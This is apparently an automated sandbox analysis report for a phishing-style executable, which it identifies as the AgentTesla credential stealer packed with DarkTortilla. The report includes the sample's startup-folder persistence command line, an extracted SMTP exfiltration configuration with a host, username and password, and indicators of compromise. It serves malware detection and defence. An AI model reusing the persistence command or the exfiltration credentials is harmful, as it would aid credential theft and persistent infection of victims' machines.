Edit tour

Windows Analysis Report
Drawing specification and June PO #07329.exe

Overview

General Information

Sample name:	Drawing specification and June PO #07329.exe
Analysis ID:	1466179
MD5:	d9b0ee244191e7fce879415f619e88c5
SHA1:	6095d064c3e5edfb7669ab435a89296946ce720a
SHA256:	323ac60ab28aeb551da47309cb6b5e9a7b23d669a983b51e7fd09e706596b97e
Tags:	exe
Infos:

Detection

AgentTesla, DarkTortilla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

.NET source code contains potential unpacker

AI detected suspicious sample

Allocates memory in foreign processes

Contains functionality to log keystrokes (.Net Source)

Drops PE files to the startup folder

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries Google from non browser process on port 80

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Outbound SMTP Connections

Stores files to the Windows start menu directory

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Drawing specification and June PO #07329.exe (PID: 1372 cmdline: "C:\Users\user\Desktop\Drawing specification and June PO #07329.exe" MD5: D9B0EE244191E7FCE879415F619E88C5)

cmd.exe (PID: 6704 cmdline: "cmd" /c ping 127.0.0.1 -n 38 > nul && copy "C:\Users\user\Desktop\Drawing specification and June PO #07329.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" && ping 127.0.0.1 -n 38 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 3200 cmdline: ping 127.0.0.1 -n 38 MD5: B3624DD758CCECF93A1226CEF252CA12)

PING.EXE (PID: 6996 cmdline: ping 127.0.0.1 -n 38 MD5: B3624DD758CCECF93A1226CEF252CA12)

file.exe (PID: 6524 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: D9B0EE244191E7FCE879415F619E88C5)

InstallUtil.exe (PID: 5248 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

InstallUtil.exe (PID: 1404 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

file.exe (PID: 4052 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: D9B0EE244191E7FCE879415F619E88C5)

InstallUtil.exe (PID: 5928 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.privateemail.com", "Username": "pin@hm-heating-de.icu", "Password": "mGr{)g5TVG3j"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.4674651066.0000000003973000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2574686488.0000000006610000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000C.00000002.4660130188.000000000295E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000F.00000002.3704842607.0000000000802000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3704842607.0000000000802000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2572021121.0000000003E99000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2566518766.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000E.00000002.4659098150.00000000027BC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2566518766.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.4062928244.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000E.00000002.4659098150.0000000002791000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.4659098150.0000000002791000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Drawing specification and June PO #07329.exe PID: 1372	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: Drawing specification and June PO #07329.exe PID: 1372	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Drawing specification and June PO #07329.exe PID: 1372	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Drawing specification and June PO #07329.exe PID: 1372	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: file.exe PID: 4052	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: file.exe PID: 4052	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 6524	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: file.exe PID: 6524	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6524	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 6524	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: InstallUtil.exe PID: 5928	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 5928	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: InstallUtil.exe PID: 5248	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 5248	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Drawing specification and June PO #07329.exe.3edfd50.0.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
15.2.InstallUtil.exe.800000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.InstallUtil.exe.800000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
15.2.InstallUtil.exe.800000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33557:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33673:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3374f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33875:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Drawing specification and June PO #07329.exe.6610000.6.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Drawing specification and June PO #07329.exe.3edfd50.0.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Drawing specification and June PO #07329.exe.4053a9a.3.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Drawing specification and June PO #07329.exe.4053a9a.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Drawing specification and June PO #07329.exe.4053a9a.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Drawing specification and June PO #07329.exe.4053a9a.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31757:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31873:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3194f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a75:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Drawing specification and June PO #07329.exe.6610000.6.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Drawing specification and June PO #07329.exe.4018eca.5.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Drawing specification and June PO #07329.exe.4018eca.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Drawing specification and June PO #07329.exe.4018eca.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Drawing specification and June PO #07329.exe.4018eca.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31757:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31873:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3194f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a75:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Drawing specification and June PO #07329.exe.408e65a.1.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Drawing specification and June PO #07329.exe.408e65a.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Drawing specification and June PO #07329.exe.408e65a.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Drawing specification and June PO #07329.exe.408e65a.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31757:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31873:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3194f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a75:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Drawing specification and June PO #07329.exe.3df4110.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Drawing specification and June PO #07329.exe.3df4110.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Drawing specification and June PO #07329.exe.3df4110.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31757:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31873:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3194f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a75:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Drawing specification and June PO #07329.exe.3db9562.4.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Drawing specification and June PO #07329.exe.3db9562.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Drawing specification and June PO #07329.exe.3db9562.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Drawing specification and June PO #07329.exe.3df4110.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Drawing specification and June PO #07329.exe.3df4110.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Drawing specification and June PO #07329.exe.3db9562.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31757:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31873:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3194f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a75:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Drawing specification and June PO #07329.exe.3df4110.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33557:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33673:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3374f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33875:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Drawing specification and June PO #07329.exe.408e65a.1.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Drawing specification and June PO #07329.exe.408e65a.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Drawing specification and June PO #07329.exe.408e65a.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Drawing specification and June PO #07329.exe.408e65a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33557:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33673:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3374f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33875:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6e0a5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33557:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6e117:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e1a1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33673:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e233:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e29d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3374f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e30f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e3a5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33875:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e435:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Drawing specification and June PO #07329.exe.3db9562.4.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Drawing specification and June PO #07329.exe.3db9562.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Drawing specification and June PO #07329.exe.3db9562.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Drawing specification and June PO #07329.exe.3db9562.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6e093:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33557:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6e105:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e18f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33673:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e221:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e28b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3374f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e2fd:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e393:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33875:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e423:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Drawing specification and June PO #07329.exe.4018eca.5.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Drawing specification and June PO #07329.exe.4018eca.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Drawing specification and June PO #07329.exe.4018eca.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Drawing specification and June PO #07329.exe.4018eca.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6e0b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa8c75:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33557:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6e127:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa8ce7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e1b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa8d71:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33673:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e243:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa8e03:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e2ad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa8e6d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3374f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e31f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xa8edf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e3b5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xa8f75:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Click to see the 40 entries

Sigma Signatures

System Summary

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe, ProcessId: 1372, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.lnk

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 198.54.122.135, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 5928, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49732

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Drawing specification and June PO #07329.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Avira: detection malicious, Label: HEUR/AGEN.1311110

Found malware configuration

Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.privateemail.com", "Username": "pin@hm-heating-de.icu", "Password": "mGr{)g5TVG3j"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: Drawing specification and June PO #07329.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Drawing specification and June PO #07329.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49731 version: TLS 1.2

Source: Drawing specification and June PO #07329.exe

